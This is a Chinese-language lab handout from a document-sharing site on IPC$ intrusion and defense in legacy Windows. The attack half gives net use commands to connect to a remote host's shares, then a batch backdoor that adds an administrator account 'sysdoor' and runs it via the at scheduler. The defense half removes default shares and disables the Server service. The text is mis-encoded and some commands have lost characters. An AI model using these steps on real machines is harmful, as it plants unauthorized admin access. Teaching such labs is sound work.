版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、.IPC$入侵和防范實(shí)驗(yàn)一、 試驗(yàn)?zāi)康模簩W(xué)習(xí)使用windows系統(tǒng)自帶IPC$有關(guān)的的網(wǎng)絡(luò)管理和控制命令,鞏固對(duì)所學(xué)知識(shí)的理解。 二、試驗(yàn)內(nèi)容:通過使用windows系統(tǒng)自帶的IPC$有關(guān)的網(wǎng)絡(luò)管理和控制命令,觀看其結(jié)果并進(jìn)行分析,加深對(duì)這些工具的理解和靈活運(yùn)用。三、試驗(yàn)環(huán)境: (1)安裝WINDOWS NT 或WINDOWS 2000以上版本的操作系統(tǒng)。 (2)已開放IPC$共享。 (3)已知遠(yuǎn)程主機(jī)IP地址。 (4)已知遠(yuǎn)程主機(jī)的管理員帳號(hào)和密碼(IPC$空連接除外) 其中遠(yuǎn)程主機(jī)所需條件: 1、安裝WINDOWS NT 或WINDOWS 2000以上版本的操作系統(tǒng)。 2、已開放IPC$共
2、享。 3、已啟動(dòng)SERVER服務(wù)。四、試驗(yàn)步驟: 啟動(dòng)命令行控制臺(tái)(虛擬機(jī)和本地機(jī)) 單擊“開始”“運(yùn)行”,在“運(yùn)行”對(duì)話框中鍵入:“CMD“命令啟動(dòng)命令行控制臺(tái)。 查看IPC$共享是否開放:CmdNet share 在虛擬機(jī)上建立用戶,并把用戶加入administators組中 Net user 用戶名 密碼 /add Net localgroup administrators 用戶名/add Net localgroup adminstrators 建立IPC$連接 在命令行提示符下鍵入如下命令: Net use IP地址ipc$ “密碼”/user:用戶名如:Net use IP地址ip
3、c$ “12345”/user:administrator映射網(wǎng)絡(luò)驅(qū)動(dòng)器 成功建立了IPC$連接后,在命令行提示符下鍵入命令: Net use 本地盤符 IP地址共享名如:Net use z: 192.168.1.3c$ 該命令的執(zhí)行結(jié)果是將目標(biāo)主機(jī)的C盤映射為本地機(jī)的z盤。映射成功后,就可以對(duì)目標(biāo)主機(jī)進(jìn)行操作和控制了。COPY文件 命令格式:Copy 本地文件的路徑文件名 遠(yuǎn)程主機(jī)IP遠(yuǎn)程主機(jī)文件路徑。如:Copy c:/bake.bat 192.168.1.3c$ 斷開IPC$連接 在命令行提示符下鍵入命令: Net use IP地址IPC$/del思考:如果不知道遠(yuǎn)程主機(jī)的用戶名和密碼,
4、可以連接上遠(yuǎn)程主機(jī)嗎?可以實(shí)現(xiàn)以上哪些操作? 留后門 (1)打開記事本編寫批處理程序 建立后門的批處理程序?yàn)椋?Net user sysdoor 12345 /add Net localgroup administrator sysdoor /add 其中“Net user sysdoor 12345 /add“命令添加密碼為12345的帳號(hào)sysdoor。“Net localgroup administrator sysdoor /add” 命令則把sysdoor帳號(hào)添加到管理員組中去。 后門程序編寫好后,需要起個(gè)名字,在我們的實(shí)驗(yàn)中將它取名為“bake.bat”。 (2)批處理程序建立好后
5、,我們通過IPC$將它拷貝到目標(biāo)主機(jī),命令格式為:Copy 本地文件的路徑文件名 遠(yuǎn)程主機(jī)IP遠(yuǎn)程主機(jī)文件路徑。 Copy c:/bake.bat 192.168.1.3c$ (3)在命令行提示符下鍵入命令:net time ip,查看系統(tǒng)時(shí)間 At 192.168.1.3 14:10 c:bake.bat 斷開IPC$連接 在命令行提示符下鍵入命令: Net use 192.168.1.3IPC$ /del 這條命令的執(zhí)行結(jié)果是斷開與遠(yuǎn)程主機(jī)192.168.1.3的IPC$連接。我們也可以用Net use */del斷開所有的連接。 IPC$空連接 如果我們要與遠(yuǎn)程主機(jī)192.168.1.3
6、建立IPC$空連接,則在命令行提示符下鍵入命令: Net use 192.168.1.3 “ ” /user: Ipc$防御試驗(yàn)二IPC$的安全解決方案 刪除默認(rèn)共享(1)在命令符下鍵入Net share 命令查看系統(tǒng)當(dāng)前的默認(rèn)共享。 (2)打開記事本,編寫批處理程序,如下: Net share IPC$ /del Net share e$ /del Net share c$ /del Net share d$ /del(3) 保存為delshare.bat(4) 單擊C:Documents and SettingsAdministrator開始菜單程序啟動(dòng),將delshare.bat文件拷貝
7、到它的啟動(dòng)組中。做完前面的事情后,重新啟動(dòng)計(jì)算機(jī),然后用Net share 命令驗(yàn)證一下系統(tǒng)中的默認(rèn)共享資源是否已經(jīng)被全部刪除,如果沒有,還有哪些?嘗試在本地機(jī)中用Net use IP地址ipc$ “密碼”/user:用戶名的命令是否還能建立IPC$連接? 關(guān)閉SERVER服務(wù)單擊“控制面板”“管理工具”“服務(wù)”打開服務(wù)管理器,在服務(wù)列表中找到“Server”服務(wù),用右鍵單擊該服務(wù),在彈出的菜單中選擇”屬性“,然后選擇”禁止“選項(xiàng)就完成了關(guān)閉操作。重啟計(jì)算機(jī)后修改生效。再次驗(yàn)證:嘗試在本地機(jī)中用Net use IP地址ipc$ “密碼”/user:用戶名的命令是否還能建立IPC$連接?如果不能
8、,將返回什么錯(cuò)誤信息。 給系統(tǒng)設(shè)置一個(gè)安全的密碼IPC$入侵一般都是通過掃描弱口令開始的,一旦入侵者掃描不到任何口令,IPC$入侵就無(wú)從談起。1. 啟動(dòng)命令行控制臺(tái)(虛擬機(jī)和本地機(jī))2. 查看IPC$共享是否開放:3.在虛擬機(jī)上建立用戶,并把用戶加入administators組中4.建立IPC$連接5.映射網(wǎng)絡(luò)驅(qū)動(dòng)器6.COPY文件7. 斷開IPC$連接 8 .(1)打開記事本編寫批處理程序,建立后門的批處理程序.(2)批處理程序建立好后,我們通過IPC$將它拷貝到目標(biāo)主機(jī)(3)在命令行提示符下鍵入命令:net time ip,查看系統(tǒng)時(shí)間(4) 斷開IPC$ 連接(5)Net use */del斷開所有的連接。(6)IPC$空連接Ipc$防御試驗(yàn)二IPC$的安全解決方案1.刪除默認(rèn)共享(1)在命令符下鍵入Net share 命令查看系統(tǒng)當(dāng)前的默認(rèn)共享。(2)打開記事本,編寫批處理程序 (3) 保存為delshare.bat(4)將delsha
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 《模具制造工藝學(xué)》教學(xué)大綱
- 教案裝訂順序
- 四個(gè)自信課件
- 玉溪師范學(xué)院《現(xiàn)代教育技術(shù)》2022-2023學(xué)年第一學(xué)期期末試卷
- 玉溪師范學(xué)院《田徑》2021-2022學(xué)年第一學(xué)期期末試卷
- 教練員繼續(xù)教育考試題目及答案-知識(shí)題庫(kù)
- 湖南師大附中2024-25屆高三年級(jí)月考試卷(二)(英語(yǔ))
- 電商公司整體薪酬設(shè)計(jì)(早期)
- 《信號(hào)基礎(chǔ)設(shè)備》全套教學(xué)課件
- 2023年雙頻、雙模移動(dòng)通信手機(jī)項(xiàng)目綜合評(píng)估報(bào)告
- 精準(zhǔn)醫(yī)療與個(gè)體化治療
- 雞尾酒種類大全
- 職業(yè)技術(shù)學(xué)院計(jì)算機(jī)應(yīng)用技術(shù)專業(yè)教學(xué)標(biāo)準(zhǔn)
- (高清版)JTG 2112-2021 城鎮(zhèn)化地區(qū)公路工程技術(shù)標(biāo)準(zhǔn)
- 中國(guó)新能源汽車安全發(fā)展報(bào)告-2023-03-新能源
- PE100管施工方案水平定向鉆
- 實(shí)驗(yàn)室試劑管理培訓(xùn)
- 超星爾雅學(xué)習(xí)通《中國(guó)近現(xiàn)代史綱要(首都師范大學(xué))》2024章節(jié)測(cè)試答案
- 新部編版九年級(jí)語(yǔ)文下冊(cè)《詞四首》導(dǎo)學(xué)案
- (2024年)小學(xué)體育多媒體課件
- 物資設(shè)備盤點(diǎn)報(bào)告(模版)
評(píng)論
0/150
提交評(píng)論